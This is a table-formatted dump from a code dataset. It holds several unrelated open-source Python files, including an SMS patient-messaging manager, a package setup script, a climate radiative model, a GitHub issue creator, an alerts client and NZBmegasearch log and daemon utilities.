code stringlengths 2 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int32 2 1.05M |
|---|---|---|---|---|---|
from sris import db, models
from messenger import Messenger
from service import SMSService
from datetime import datetime
class Manager:
"""
The middle-man of interaction between messenger and the SMS service.
"""
def __init__(self):
self.config = self.__load_config_file()
self.messenger = Messenger(self.config)
self.sms_service = SMSService()
def send_initial_greeting(self):
"""
Sends the initial SMS to new* patients at a pre-defined client time.
*New patients are those that have recently been added
to the clients database, which the service does not know.
Note: this is REQUIRED otherwise 'respond' & other services do not
function as database errors are thrown (understandably).
"""
from datetime import datetime
current_time = str(datetime.now().time())[0:5]
# Send the message to new patients at the defined time.
if current_time == self.config['initialQuestion']['time']:
for number in self.__new_patients():
message = self.messenger.initial_message()
self.sms_service.send(number, message)
self.__create_new_patient(number)
self.__save_message(number, message, 'sent')
def respond(self, patient_response):
"""
Respond to new SMS when it is received via a POST request.
Args:
patient_message (dict): Contains the number, and message sent to
the service by a patient.
Returns:
response (XML): twilio formatted response.
"""
number = patient_response['number']
patient_message = patient_response['message']
# Generate a reflective summary based on the patient's response.
summary = self.messenger.summary(patient_message)
# TODO: Fix this with the system set time (i.e. UTC)
midnight = int(datetime.today().strftime("%s")) - 24*60*60
# The number of questions sent since last night.
_questions = db.session.query(models.Message).filter(
models.Message.mobile == number,
models.Message.status == 'sent',
models.Message.timestamp >= midnight).all()
all_sent = [item.message for item in _questions]
# The number of OEQ sent since last night.
num_oeq = len([i for i in self.config['questions'] if i in all_sent])
print 'Number OEQ sent since last night was: %s' % str(num_oeq)
response = None
# Do not send a response if initial daily conversation not started.
if num_oeq >= 1:
print 'The last sms sent was: %s' % all_sent[-1]
if all_sent[-1] in self.config['questions']:
print 'Last message sent was an OEQ. Sending a RS to patient.'
response = summary
else:
print 'Inside the else..'
if (num_oeq >= int(self.config['limit'])): # True: OEQ >= LIMIT
print 'Inside the else... in the if...'
if self.config['endQuestion'] not in all_sent:
print 'Sending the conversation closer as limit met.'
response = self.config['endQuestion']
else:
print 'Message received was response to a RS. Sending OEQ.'
response = self.__select_question(number)
if response:
self.__save_message(number, patient_message, 'received')
self.__save_message(number, response, 'sent')
print 'The response (%s) has been saved to the database.' % response
return self.sms_service.reply(response)
else:
print 'No response was created.'
return '' # Prevents a 500 error code returned to POST.
def send_initial_question_to_all(self):
"""
Sends a question to all patients at a pre-defined day and time.
"""
known_patients = [item.mobile for item in
db.session.query(models.Patient.mobile).all()]
from datetime import datetime
print "Checking to see if open-ended question should be sent."
isDay = datetime.now().strftime("%A") in self.config["daysToSend"]
isTime = str(datetime.now().time())[0:5] == self.config["sendTime"]
if isDay and isTime:
for number in known_patients:
message = self.__select_question(number)
print "OEQ (%s) to patient (%s)." % (message, number)
self.__save_message(number, message, 'sent')
self.sms_service.send(number, message)
def __select_question(self, number):
"""
Select a client-defined open-ended question that has not been previously
selected at random. If all have been sent then select one at random.
Args:
number (str): The mobile number of the patient.
Returns:
str: An open-ended question to ask the patient.
"""
questions = self.config['questions']
sent_questions = [item.message for item in db.session.query(
models.Message).filter(models.Message.mobile == number).all()]
unsent_questions = list(set(questions).difference(sent_questions))
# TODO: Select most important question based on client's situation
import random
if unsent_questions:
print "Sending a message that HAS NOT been previously sent."
message = random.choice(unsent_questions)
else:
print "Sending a message that HAS been previously sent."
message = random.choice(questions)
return message
def __load_config_file(self):
"""
Stores the contents of the client-defined config file to a json object.
Returns:
json: A json object of the user-defined config file.
"""
import json
from flask import current_app
config_file = current_app.config['PROJECT_ROOT'] + '/sris/config/' + \
current_app.config['CLIENT_NAME'] + '.json'
with open(config_file) as json_settings:
return json.load(json_settings)
def __new_patients(self):
"""
Checks to see if any new patients have been added to the client DB.
Returns:
list: Mobile numbers the client knows & the service does not.
"""
# ALL numbers obtained from the client.
client_numbers = db.session.query(models.Patient.mobile).all()
# The numbers the service has to date.
service_numbers = db.session.query(models.User.mobile).all()
# The numbers the client has, but the service does not.
numbers = set(client_numbers).difference(service_numbers)
print 'There was %s new patients' % str(len(numbers))
# Convert SQLAlchemy KeyedTuple to ordinary list.
return [item.mobile for item in numbers]
def __create_new_patient(self, number):
"""
Adds the patient to the service database.
Args:
number (str): The mobile number of the patient.
"""
db.session.add(models.User(mobile=number))
db.session.commit()
def __save_message(self, number, message, status):
"""
Save the SMS message (sent or received) to the service database.
Args:
number (str): The mobile number of the patient.
message (str): The SMS message content.
status (str): The status of the message, e.g. 'sent' or 'received'.
"""
db.session.add(models.Message(mobile=number, message=message,
status=status))
db.session.commit()
| jawrainey/sris | sris/manager.py | Python | mit | 7,789 |
#!/usr/bin/env python3
import sys
import os
from setuptools import setup, find_packages
import amqpy
# Refuse to install on interpreters older than the minimum supported version.
if sys.version_info < (3, 2):
    raise Exception('amqpy requires Python 3.2 or higher')
# Distribution metadata consumed by the setup() call below.
name = 'amqpy'
description = 'an AMQP 0.9.1 client library for Python >= 3.2.0'
keywords = ['amqp', 'rabbitmq', 'qpid']
# Trove classifiers: supported interpreters, audience, and license.
classifiers = [
    'Development Status :: 4 - Beta',
    'Programming Language :: Python',
    'Programming Language :: Python :: Implementation :: CPython',
    'Programming Language :: Python :: Implementation :: PyPy',
    'Programming Language :: Python :: 3 :: Only',
    'Programming Language :: Python :: 3.2',
    'Programming Language :: Python :: 3.3',
    'Programming Language :: Python :: 3.4',
    'License :: OSI Approved :: MIT License',
    'Intended Audience :: Developers',
    'Topic :: Internet',
    'Topic :: Software Development :: Libraries :: Python Modules',
    'Topic :: System :: Networking'
]
# Non-Python files shipped inside every package.
package_data = {
    '': ['*.rst', '*.ini', 'AUTHORS', 'LICENSE'],
}
def long_description():
    """Return the README contents if present, else the short description.

    The README is read as explicit UTF-8 so the sdist build does not depend
    on the build machine's locale encoding.
    """
    if os.path.exists('README.rst'):
        with open('README.rst', encoding='utf-8') as f:
            return f.read()
    return description
# Register the distribution; author/version fields are pulled from the
# amqpy package itself so the metadata lives in one place.
# NOTE(review): license='LGPL' disagrees with the MIT classifier declared
# above — confirm which license actually applies.
setup(
    name=name,
    description=description,
    long_description=long_description(),
    version=amqpy.__version__,
    author=amqpy.__author__,
    author_email=amqpy.__contact__,
    maintainer=amqpy.__maintainer__,
    url=amqpy.__homepage__,
    platforms=['any'],
    license='LGPL',
    packages=find_packages(exclude=['ez_setup', 'tests', 'tests.*']),
    package_data=package_data,
    tests_require=['pytest>=2.6'],
    classifiers=classifiers,
    keywords=keywords
)
| gst/amqpy | setup.py | Python | mit | 1,664 |
import sys
import argparse
from itertools import izip
import math
def parseArgument():
    """Parse the command-line options; all three file names are required."""
    parser = argparse.ArgumentParser(description = "Make regions with 0 signal the average of their surrounding regions")
    parser.add_argument("--signalsFileName", required=True, help='Signals file')
    parser.add_argument("--peakIndexesFileName", required=True, help='Peak indexes file')
    parser.add_argument("--outputFileName", required=True, help='Output file, where signals that were 0 will be the average of their surrounding signals')
    return parser.parse_args()
def averageZeroSignalsWithinPeaks(options):
    """Replace zero signals with the average of their neighbouring signals.

    Walks the signals file and the peak-indexes file in lockstep (one value
    per line; Python 2 ``izip``) and writes the corrected signal stream to
    the output file. A zero is averaged only with neighbours belonging to
    the same peak; NaN neighbours are skipped, falling back to whichever
    usable neighbour remains, or to the original value.
    """
    signalsFile = open(options.signalsFileName)
    peakIndexesFile = open(options.peakIndexesFileName)
    outputFile = open(options.outputFileName, 'w+')
    # Two-deep history: the previous and the one-before-previous line.
    lastSignal = None
    lastLastSignal = None
    lastPeakIndex = None
    lastLastPeakIndex = None
    for signalsLine, peakIndexesLine in izip(signalsFile, peakIndexesFile):
        # Iterate through the signals and set those that are zero to the average of those of the surrounding regions
        signal = float(signalsLine.strip())
        peakIndex = int(peakIndexesLine.strip())
        if lastSignal == 0:
            # The previous signal was a zero, so set it to the average of the surrounding signals
            if (peakIndex == lastPeakIndex) and (not math.isnan(lastSignal)):
                # Include the current region in the average
                if (lastPeakIndex == lastLastPeakIndex) and (not math.isnan(lastLastSignal)):
                    # Include the region before the previous region in the average
                    if not math.isnan(signal):
                        # The current signal is not a nan, so include it in the average
                        lastSignalCorrected = (signal + lastLastSignal)/2.0
                        outputFile.write(str(lastSignalCorrected) + "\n")
                    else:
                        # The current signal is a nan, so use only the previous signal
                        outputFile.write(str(lastLastSignal) + "\n")
                elif not math.isnan(signal):
                    # Only the current region is usable for the replacement.
                    outputFile.write(str(signal) + "\n")
                else:
                    # No usable neighbour: emit the zero unchanged.
                    outputFile.write(str(lastSignal) + "\n")
            elif (lastPeakIndex == lastLastPeakIndex) and (not math.isnan(lastLastSignal)):
                # Set the output to the region before it
                outputFile.write(str(lastLastSignal) + "\n")
            else:
                outputFile.write(str(lastSignal) + "\n")
        if signal != 0:
            # The current signal is not 0, so record it
            outputFile.write(str(signal) + "\n")
        # Shift the two-deep history window forward by one line.
        lastLastSignal = lastSignal
        lastLastPeakIndex = lastPeakIndex
        lastSignal = signal
        lastPeakIndex = peakIndex
    if lastSignal == 0:
        # The final signal was a zero, so set it to the signal before it
        if (lastPeakIndex == lastLastPeakIndex) and (not math.isnan(lastLastSignal)):
            # Set the output to the region before it
            outputFile.write(str(lastLastSignal) + "\n")
        else:
            outputFile.write(str(lastSignal) + "\n")
    signalsFile.close()
    peakIndexesFile.close()
    outputFile.close()
if __name__=="__main__":
    # Script entry point: parse CLI options, then run the averaging pass.
    options = parseArgument()
    averageZeroSignalsWithinPeaks(options)
| imk1/IMKTFBindingCode | averageZeroSignalsWithinPeaks.py | Python | mit | 2,918 |
#!/usr/bin/python3
#!python3
#encoding:utf-8
import sys
import os.path
import subprocess
import configparser
import argparse
import web.service.github.api.v3.AuthenticationsCreator
import web.service.github.api.v3.Client
import database.src.Database
import cui.uploader.Main
import web.log.Log
import database.src.contributions.Main
import setting.Setting
class Main:
    """CLI entry point that creates a GitHub issue for a local repository.

    Looks up the user and repository in the local database, then calls the
    GitHub v3 API client to open the issue.
    """
    def __init__(self):
        pass
    def Run(self):
        """Parse arguments, validate user/repo against the DB, create the issue."""
        self.__def_args()
        self.__setting = setting.Setting.Setting(os.path.abspath(os.path.dirname(__file__)))
        # Workaround so that os.path.basename() does not return an empty string
        # for paths ending in '/'.
        # https://docs.python.jp/3/library/os.path.html#os.path.basename
        # if self.__args.path_dir_pj.endswith('/'): self.__args.path_dir_pj = self.__args.path_dir_pj[:-1]
        if None is self.__args.username: self.__args.username = self.__setting.GithubUsername
        self.__db = database.src.Database.Database(os.path.abspath(os.path.dirname(__file__)))
        self.__db.Initialize()
        # Bail out when the requested user has not been registered locally.
        if None is self.__db.Accounts['Accounts'].find_one(Username=self.__args.username):
            web.log.Log.Log().Logger.warning('指定したユーザ {0} はDBに存在しません。UserRegister.pyで登録してください。'.format(self.__args.username))
            return
        self.__account = self.__db.Accounts['Accounts'].find_one(Username=self.__args.username)
        self.__ssh_configures = self.__db.Accounts['SshConfigures'].find_one(AccountId=self.__account['Id'])
        # The repository name is derived from the project directory name.
        self.__repo_name = os.path.basename(self.__args.path_dir_pj)
        self.__repos = self.__db.Repositories[self.__args.username]['Repositories'].find_one(Name=self.__repo_name)
        if None is self.__repos:
            web.log.Log.Log().Logger.warning('指定リポジトリがDBに存在しません。: {0}/{1}'.format(self.__args.username, self.__repo_name))
            return
        # self.__log()
        issue = self.__create_issue()
        print('Issue番号:', issue['number'])
        print(issue)
    def __def_args(self):
        """Define and parse the command-line arguments."""
        parser = argparse.ArgumentParser(
            description='GitHub Repository Creator.',
        )
        parser.add_argument('path_dir_pj')
        parser.add_argument('-u', '--username')
        # parser.add_argument('-r', '--reponame', required=True)
        parser.add_argument('-i', '--issues', required=True, action='append')
        parser.add_argument('-l', '--labels', action='append')
        parser.add_argument('-c', '--is-close', action='store_false') # is_close
        self.__args = parser.parse_args()
    def __log(self):
        """Log the account / SSH / repository details (debug helper)."""
        web.log.Log.Log().Logger.info('ユーザ名: {0}'.format(self.__account['Username']))
        web.log.Log.Log().Logger.info('メアド: {0}'.format(self.__account['MailAddress']))
        web.log.Log.Log().Logger.info('SSH HOST: {0}'.format(self.__ssh_configures['HostName']))
        # web.log.Log.Log().Logger.info('リポジトリ名: {0}'.format(self.__repos['Name']))
        # web.log.Log.Log().Logger.info('説明: {0}'.format(self.__repos['Description']))
        # web.log.Log.Log().Logger.info('URL: {0}'.format(self.__repos['Homepage']))
        web.log.Log.Log().Logger.info('リポジトリ名: {0}'.format(self.__repo_name))
        web.log.Log.Log().Logger.info('説明: {0}'.format(self.__args.description))
        web.log.Log.Log().Logger.info('URL: {0}'.format(self.__args.homepage))
    def __create_issue(self):
        """Authenticate against GitHub and create the issue; returns the API response."""
        auth_creator = web.service.github.api.v3.AuthenticationsCreator.AuthenticationsCreator(self.__db, self.__args.username)
        authentications = auth_creator.Create()
        client = web.service.github.api.v3.Client.Client(self.__db, authentications, self.__args)
        title = self.__args.issues[0]
        body = None
        # Line 1 is the title, line 2 a blank line, lines 3+ form the body.
        if 1 < len(self.__args.issues): body = '\n'.join(self.__args.issues[1:])
        return client.Issues.create(title, body=body)
        # main = cui.uploader.Main.Main(self.__db, client, args)
        # main.Run()
        # creator = cui.uploader.command.repository.Creator.Creator(self.__db, client, self.__args)
        # creator.Create()
if __name__ == '__main__':
    # Script entry point.
    main = Main()
    main.Run()
| trysrv/GitHub.Uploader.CuiCmd.201706231541 | IssueCreate.py | Python | cc0-1.0 | 4,273 |
'''
NPR Puzzle 2018-10-28
https://www.npr.org/2018/10/28/660936138/sunday-puzzle-row-row-row
Think of a famous Broadway musical in two words.
Change one letter in it to the preceding letter of the alphabet —
so B would become A, C would become B, etc.
Remove the space so you have a solid word.
The result will name something that all of us are part of. What is it?
'''
import sys
sys.path.append('..')
import nprcommontools as nct
from nltk.corpus import wordnet as wn
import re
#%%
# Get a list of musicals from Wikipedia
# Candidate titles: two-word Broadway musicals from the Wikipedia category.
musicals = set(x for x in nct.wikipedia_category_members('Broadway_musicals') if x.count(' ') == 1)
#musicals = musicals.union(wikipedia_category_members('Off-Broadway_musicals'))
#musicals = musicals.union(wikipedia_category_members('American musical films'))
# Candidate answers: single-word WordNet lemma names.
words = set(x for x in wn.all_lemma_names() if x.count('_') == 0)
#%%
# Go through musicals and look for ones that work
for musical in musicals:
    # Drop non-letters and lowercase so positions line up with the solid word.
    musical_nospace = re.sub(r'[^A-Za-z]+','',musical).lower()
    for i in range(len(musical_nospace)):
        letter = musical_nospace[i]
        # Shift one letter back in the alphabet (B->A, C->B, ...) and test.
        myword = musical_nospace[:i] + nct.letter_shift(letter,-1) + musical_nospace[i+1:]
        if myword in words:
            print(musical,myword)
| boisvert42/npr-puzzle-python | 2018/1028_musical_all_of_us.py | Python | cc0-1.0 | 1,235 |
import OOMP
newPart = OOMP.oompItem(8826)
# Tag metadata for this part entry, applied in declaration order.
for tagName, tagValue in [
        ("oompType", "CAPC"),
        ("oompSize", "0603"),
        ("oompColor", "X"),
        ("oompDesc", "PF100"),
        ("oompIndex", "V50")]:
    newPart.addTag(tagName, tagValue)
OOMP.parts.append(newPart)
| oomlout/oomlout-OOMP | old/OOMPpart_CAPC_0603_X_PF100_V50.py | Python | cc0-1.0 | 245 |
# Projectiles
import pygame
import environment
from models import Projectile
class Laser(Projectile):
    """A horizontal beam stretching from its spawn point to the right screen edge."""

    def __init__(self, laser_x, laser_y, sign=None, speed=20):
        self.laser_height = 20
        # The beam always spans the remaining screen width.
        self.laser_width = environment.WINDOW_WIDTH - laser_x
        beam = pygame.Rect(laser_x, laser_y, self.laser_width, self.laser_height)
        self.laser_rect = beam
        Projectile.__init__(self, beam, sign)
        self.base_speed = speed
class Bullet(Projectile):
    """A small rectangular projectile."""

    def __init__(self, posx=0, posy=0, dimx=10, dimy=3, sign=None, parent_stat=None, speed=20):
        hitbox = pygame.Rect(posx, posy, dimx, dimy)
        Projectile.__init__(self, hitbox, sign, parent_stats=parent_stat)
        self.base_speed = speed

    def is_out_of_screen(self):
        # NOTE(review): relies on a `right` attribute presumably provided by
        # Projectile — confirm it tracks the bullet's right edge.
        return self.right > environment.WINDOW_WIDTH
| mrnoodles/AI-Pygame | models/projectiles.py | Python | cc0-1.0 | 1,123 |
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import sys
#
# Use seaborn's prettier default plot styling when it is installed;
# fall back to plain matplotlib silently otherwise.
#
try:
    import seaborn
except ImportError:  # was a bare except: only a failed import should be ignored
    pass

# Stefan-Boltzmann constant (W m^-2 K^-4).
sigma = 5.67e-8
def find_tau(tot_trans, num_layers):
    """Cumulative optical depth at each model level.

    The column is split into ``num_layers`` layers of equal transmissivity,
    so each layer transmits ``tot_trans**(1/num_layers)`` and contributes an
    optical depth of minus the log of that value.

    Args:
        tot_trans (float): total transmissivity of the whole column (0-1).
        num_layers (int): number of layers.

    Returns:
        np.ndarray: optical depth at the ``num_layers + 1`` levels; element 0
        is 0 at the first level and values grow by a constant increment.
    """
    trans_layer = tot_trans**(1. / num_layers)
    tau_layer = -1. * np.log(trans_layer)
    tau_layers = np.full(num_layers, tau_layer)
    tau_levels = np.concatenate(([0], np.cumsum(tau_layers)))
    return tau_levels
def find_heights(press_levels, rho_layers):
    """Hydrostatic height of each pressure level above the surface.

    Args:
        press_levels (np.ndarray): pressure at each level (Pa), surface first
            and decreasing upward.
        rho_layers (np.ndarray): air density of each layer (kg m^-3); one
            fewer element than ``press_levels``.

    Returns:
        np.ndarray: height of each level (m); element 0 is 0 at the surface.
    """
    g = 9.8
    # BUG FIX: the original recomputed rho_layers from the module-level
    # Temp_layers global, silently ignoring the rho_layers argument.
    del_press = press_levels[1:] - press_levels[0:-1]
    # Hydrostatic balance: dz = -dp / (rho * g).
    del_z = -1. * del_press / (rho_layers * g)
    level_heights = np.concatenate(([0], np.cumsum(del_z)))
    return level_heights
def fluxes(tau_levels, Temp_layers, T_surf):
    """Upward and downward longwave fluxes at every level.

    Performs two sweeps: surface-up for the upward flux (starting from the
    surface blackbody emission) and top-down for the downward flux (starting
    from zero at the top). Each layer transmits exp(-1.666*dtau) of the
    incident flux and adds its own blackbody emission.

    Returns:
        (up, down): two arrays of fluxes, one value per level.
    """
    n_levs = len(tau_levels)
    up = np.empty_like(tau_levels)
    down = np.empty_like(tau_levels)
    # Upward sweep, level 0 is the surface.
    up[0] = sigma * T_surf**4.
    for lev in range(1, n_levs):
        del_tau = tau_levels[lev] - tau_levels[lev - 1]
        trans = np.exp(-1.666 * del_tau)
        emitted = sigma * Temp_layers[lev - 1]**4. * (1 - trans)
        up[lev] = trans * up[lev - 1] + emitted
    # Downward sweep, nothing comes in from above the top level.
    down[n_levs - 1] = 0
    for lev in range(n_levs - 2, -1, -1):
        del_tau = tau_levels[lev + 1] - tau_levels[lev]
        trans = np.exp(-1.666 * del_tau)
        emitted = sigma * Temp_layers[lev]**4. * (1 - trans)
        down[lev] = trans * down[lev + 1] + emitted
    return (up, down)
def heating_rate(net_up, height_levels, rho_layers):
    """Radiative heating rate of each layer.

    Args:
        net_up (np.ndarray): net upward flux at each level (W m^-2).
        height_levels (np.ndarray): height of each level (m).
        rho_layers (np.ndarray): density of each layer (kg m^-3).

    Returns:
        np.ndarray: temperature tendency dT/dt for each layer (K s^-1);
        flux convergence within a layer warms it.
    """
    cpd = 1004.  # heat capacity of dry air at constant pressure (J kg^-1 K^-1)
    dFn_dz = -1. * np.diff(net_up) / np.diff(height_levels)
    dT_dt = dFn_dz / (rho_layers * cpd)
    return dT_dt
def time_step(heating_rate, Temp_layers, delta_time):
    """Advance the layer temperatures in place by one Euler step.

    Mutates ``Temp_layers`` and returns the same array for convenience.
    """
    Temp_layers += heating_rate * delta_time
    return Temp_layers
if __name__=="__main__":
    # Radiative-equilibrium column model: march layer temperatures forward
    # in time until the profile approaches equilibrium, then plot snapshots.
    tot_trans=0.2
    num_layers=100
    p_sfc=1000.*1.e2
    p_top=100.*1.e2
    g=9.8
    T_sfc=300.
    Rd=287. #J/kg/K
    num_levels=num_layers+1
    tau_levels=find_tau(tot_trans,num_layers)
    # Pressure levels ordered surface-first (reversed from linspace output).
    press_levels=np.linspace(p_top,p_sfc,num_levels)
    press_diff=np.diff(press_levels)[0]
    press_levels=press_levels[::-1]
    press_layers=(press_levels[1:] + press_levels[:-1])/2.
    # Start isothermal at the surface temperature.
    Temp_levels=np.ones([num_levels])*T_sfc
    Temp_layers=(Temp_levels[1:] + Temp_levels[:-1])/2.
    S0=241.
    Tc=273.15
    delta_time_hr=30 #time interval in hours
    delta_time_sec=30*3600. #time interval in seconds
    stop_time_hr=600*24. #stop time in hours
    times=np.arange(0,stop_time_hr,delta_time_hr) #times in hours
    tot_loops=len(times)
    num_times=len(times)
    #
    # 1-D time series: surface temperature (a level-0 quantity) and the
    # elapsed hours for each step.
    #
    sfc_temp=np.empty([num_times],dtype=np.float64)
    hours=np.empty_like(sfc_temp)
    #
    # 2-D history arrays holding the full profile at every time step:
    # air_temps is per-layer; the fluxes and heights are per-level.
    #
    air_temps=np.empty([num_layers,num_times],dtype=np.float64)
    up_flux_run=np.empty([num_levels,num_times],dtype=np.float64)
    down_flux_run=np.empty_like(up_flux_run)
    height_levels_run=np.empty_like(up_flux_run)
    for index in np.arange(0,num_times):
        rho_layers=press_layers/(Rd*Temp_layers)
        height_levels=find_heights(press_levels,rho_layers)
        up,down=fluxes(tau_levels,Temp_layers,T_sfc)
        sfc_temp[index]=T_sfc
        #
        # Print a percent-complete progress indicator every 50 steps.
        #
        if np.mod(index,50)==0:
            the_frac=np.int(index/tot_loops*100.)
            sys.stdout.write("\rpercent complete: %d%%" % the_frac)
            sys.stdout.flush()
        air_temps[:,index]=Temp_layers[:]
        up,down=fluxes(tau_levels,Temp_layers,T_sfc)
        up_flux_run[:,index]=up[:]
        down_flux_run[:,index]=down[:]
        height_levels_run[:,index]=height_levels[:]
        dT_dt=heating_rate(up-down,height_levels,rho_layers)
        Temp_layers[:]=time_step(dT_dt,Temp_layers,delta_time_sec)
        #
        # Surface energy balance: absorbed solar flux S0 plus downward
        # longwave at the surface set the new surface temperature through
        # blackbody emission (T = (F/sigma)^(1/4)).
        #
        net_downsfc=S0 + down[0]
        T_sfc=(net_downsfc/sigma)**0.25
    plt.close('all')
    fig1,axis1=plt.subplots(1,1)
    snapshots=[0,2,8,30,40,50,60,70]
    days=times/24.
    for the_snap in snapshots:
        #
        # Label each temperature-profile curve with its elapsed time in days.
        #
        label="%3.1f" % days[the_snap]
        height_levels=height_levels_run[:,the_snap]
        layer_heights=(height_levels[1:] + height_levels[:-1])/2.
        axis1.plot(air_temps[:,the_snap],layer_heights*1.e-3,label=label)
    axis1.legend()
    axis1.set_title('temperature profiles for {} days'.format(len(snapshots)))
    axis1.set_xlabel('temperature (deg C)')
    fig1.savefig("snapshots.png")
    fig2,axis2=plt.subplots(1,1)
    axis2.plot(days,sfc_temp-Tc)
    axis2.set_title('surface temperature (deg C)')
    axis2.set_ylabel('temperature (degC)')
    axis2.set_xlabel('day')
    axis2.set_xlim((0,100))
    fig2.savefig("sfc_temp.png")
    fig3,axis3=plt.subplots(1,1)
    axis3.plot(days,sfc_temp - air_temps[0,:])
    axis3.set_title('air-sea temperature difference (deg C)')
    axis3.set_ylabel('surface - first layer temp (degC)')
    axis3.set_xlabel('day')
    axis3.set_xlim((0,100))
    fig3.savefig("air_sea.png")
    plt.show()
| dennissergeev/classcode | lib/equil_run.py | Python | cc0-1.0 | 5,877 |
import simplejson as json
import urllib
import urllib2
import time
# Base URL of the alerts server; configure via set_server_url() before use.
server = ""
def GET(uri, params):
    """Issue a GET to the configured server and decode the JSON response."""
    encoded = urllib.urlencode(params)
    url = server + uri + "?" + encoded
    request = urllib2.Request(url, headers={'Accept': 'application/json'})
    response = urllib2.urlopen(request)
    return json.loads(response.read())
def POST(uri, params):
    """POST a JSON payload to the server and return the created object's id."""
    body = json.dumps(params)
    headers = {'Content-Type': 'application/json',
               'Accept': 'application/json'}
    request = urllib2.Request(server + uri, body, headers=headers)
    response = json.loads(urllib2.urlopen(request).read())
    return response["id"]
def set_server_url(url):
    """Set the module-level base URL used by GET/POST."""
    global server
    server = url
class Detector:
    """A detector registered on the alerts server, identified by name."""
    def __init__(self, name, url):
        self.name = name
        self.url = url
    def get_id(self):
        """Return the server-side id, looking it up (or creating the
        detector) on first use and caching the result on self.id."""
        try:
            return self.id
        except AttributeError:
            try:
                detectors = GET("/detectors/", {'name': self.name})
                self.id = detectors[0]['id']
            except urllib2.HTTPError as e:
                # Lookup failed: register the detector instead.
                self.id = POST("/detectors/", {'name': self.name, 'url': self.url})
            return self.id
    def realize(self):
        """Ensure the detector exists on the server."""
        self.get_id()
class Metric:
    """A metric registered under a detector on the alerts server."""
    def __init__(self, name, descr, detector):
        self.name = name
        self.descr = descr
        self.detector = detector
    def get_id(self):
        """Return the server-side id, looking it up (or creating the metric)
        on first use and caching the result on self.id.

        BUG FIX: the original never assigned self.id, so every call re-hit
        the server; now cached consistently with Detector.get_id().
        """
        try:
            return self.id
        except AttributeError:
            uri = "/detectors/" + str(self.detector.get_id()) + "/metrics/"
            try:
                metrics = GET(uri, {'name': self.name})
                self.id = metrics[0]['id']
            except urllib2.HTTPError:
                # Lookup failed: register the metric instead.
                self.id = POST(uri, {'name': self.name, 'description': self.descr})
            return self.id
    def realize(self):
        """Ensure the metric exists on the server."""
        self.get_id()
def post_alert(detector, metric, payload, emails="", date=time.strftime("%Y-%m-%d")):
    """Submit an alert for the given detector/metric; a 422 response means
    the alert already exists and is reported, not raised.

    Note: the ``date`` default is evaluated once at import time.
    """
    try:
        payload = json.dumps(payload)
        uri = "/detectors/" + str(detector.get_id()) + "/metrics/" + str(metric.get_id()) + "/alerts/"
        return POST(uri, {'description': payload, 'date': date, 'emails': emails})
    except urllib2.HTTPError as e:
        if e.code == 422:
            print "Alert for detector: " + detector.name + ", metric: " + metric.name + ", has already been submitted!"
        else:
            raise e
if __name__ == "__main__":
    # Smoke test against a locally running alerts server.
    set_server_url("http://localhost:8080")
    detector = Detector("Histogram Regression Detector", "foobar")
    metric = Metric("metric100", "foobar", detector)
    post_alert(detector, metric, "foobar")
| mozilla/iacomus-alerts | python/poster.py | Python | epl-1.0 | 2,563 |
# # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## #
#~ This file is part of NZBmegasearch by pillone.
#~
#~ NZBmegasearch is free software: you can redistribute it and/or modify
#~ it under the terms of the GNU General Public License as published by
#~ the Free Software Foundation, either version 3 of the License, or
#~ (at your option) any later version.
#~
#~ NZBmegasearch is distributed in the hope that it will be useful,
#~ but WITHOUT ANY WARRANTY; without even the implied warranty of
#~ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#~ GNU General Public License for more details.
#~
#~ You should have received a copy of the GNU General Public License
#~ along with NZBmegasearch. If not, see <http://www.gnu.org/licenses/>.
# # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## #
import requests
import sys
import base64
import DeepsearchModule
from functools import wraps
from flask import Response,request
import config_settings
from flask import render_template
import os
import subprocess
import datetime
import time
import logging
import SearchModule
import urlparse
import urllib
import datetime
import json
from operator import itemgetter
#~ max visualized: upper bound on log lines returned by logviewer()
LOG_MAXLINES = 500
log = logging.getLogger(__name__)
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
def logviewer(logsdir):
    """Render the last LOG_MAXLINES lines of the main log, newest first.

    Args:
        logsdir: directory (with trailing separator) containing the log file.
    """
    filename = logsdir + 'nzbmegasearch.log'
    array1 = []
    count = 0
    # FIX: use a context manager so the file handle is always released
    # (the original leaked the handle returned by open()).
    with open(filename) as logfile:
        all_lines = logfile.readlines()
    for line in reversed(all_lines):
        if(count > LOG_MAXLINES):
            break
        array1.append(line.decode('utf-8').rstrip())
        count = count + 1
    return(render_template('loginfo.html', loginfo=array1))
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
def daemonize(logsdir):
    """Detach the process from the terminal via the classic UNIX double fork.

    Python 2 / UNIX only (uses ``except X, e`` syntax, ``file()`` and
    os.fork). The parent exits at each fork; the surviving grandchild
    becomes a session leader with stdin redirected to /dev/null.
    """
    #~ full credits to SICKBEARD
    # Make a non-session-leader child process
    try:
        pid = os.fork() # @UndefinedVariable - only available in UNIX
        if pid != 0:
            sys.exit(0)
    except OSError, e:
        raise RuntimeError("1st fork failed: %s [%d]" % (e.strerror, e.errno))
    os.setsid() # @UndefinedVariable - only available in UNIX
    # Make sure I can read my own files and shut out others
    prev = os.umask(0)
    os.umask(prev and int('077', 8))
    # Make the child a session-leader by detaching from the terminal
    try:
        pid = os.fork() # @UndefinedVariable - only available in UNIX
        if pid != 0:
            sys.exit(0)
    except OSError, e:
        raise RuntimeError("2nd fork failed: %s [%d]" % (e.strerror, e.errno))
    dev_null = file('/dev/null', 'r')
    os.dup2(dev_null.fileno(), sys.stdin.fileno())
    log.info("Daemonized using PID " + str(pid))
    #~ LEGACY DAEMON LOGGING
    #~ silences console output
    #~ sys.stdout = open('tmpdl', 'wt')
    #~ logging.basicConfig(
    #~ level=logging.DEBUG,
    #~ format='%(asctime)s:%(levelname)s:%(name)s:%(message)s',
    #~ filename=logsdir+'nzbmegasearch_daemon.log',
    #~ filemode='a')
    #~ stdout_logger = logging.getLogger('STDOUT')
    #~ sl = StreamToLogger(stdout_logger, logging.INFO)
    #~ sys.stdout = sl
    #~ stderr_logger = logging.getLogger('STDERR')
